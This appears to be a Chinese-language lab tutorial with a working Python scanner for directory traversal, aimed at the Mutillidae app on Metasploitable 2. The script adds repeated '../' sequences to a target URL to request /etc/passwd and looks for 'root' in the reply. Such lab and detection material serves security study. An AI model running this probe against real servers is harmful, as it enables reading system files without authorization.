利用Python实现目录遍历漏洞的发现工具

 

　　本代码实验所用的目标应用为metasploitable 2的Multillidae。核心思想是看是否可以请求到Linux系统中都会存在的/etc/passwd文件，而且该文件中必然会有root字段。

import optparse
import requests
import sys

class DirectoryTraversal:
    def __init__(self) -> None:
        self.url = self.url_prefix_formatter(self.get_params())
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0'
        }

    def get_params(self):
        parser = optparse.OptionParser('Usage: < Program > -u url ')
        parser.add_option('-u', '--url', dest='url', type='string', help='Specify url to detect')
        options, args = parser.parse_args()
        if options.url is None:
            print(parser.usage)
            sys.exit()
        return options.url
    
    def url_prefix_formatter(self, url):
        if url.startswith('http://'):
            return url
        elif url.startswith('https://'):
            return url
        else:
            return 'http://' + url
    
    def retrieve_webpage(self, url):
        try:
            response = requests.get(url=url, headers=self.headers)
            if response.status_code == 200:
                return response.text
        except Exception as e:
            pass
    
    def run(self):
        flag = False
        upward = '../'
        for i in range(7):
            url = self.url +str(i*upward)+'etc/passwd'
            
            response = self.retrieve_webpage(url)
            if response:
                if 'root' in response:
                    print("Found directory traversal vulnerability:\t", url)
                    flag = True
                    sys.exit()
        
        if flag == False:
            print("Failed to detect directory tranversal vulnerability")

if __name__ == '__main__':
    dir_obj = DirectoryTraversal()
    dir_obj.run()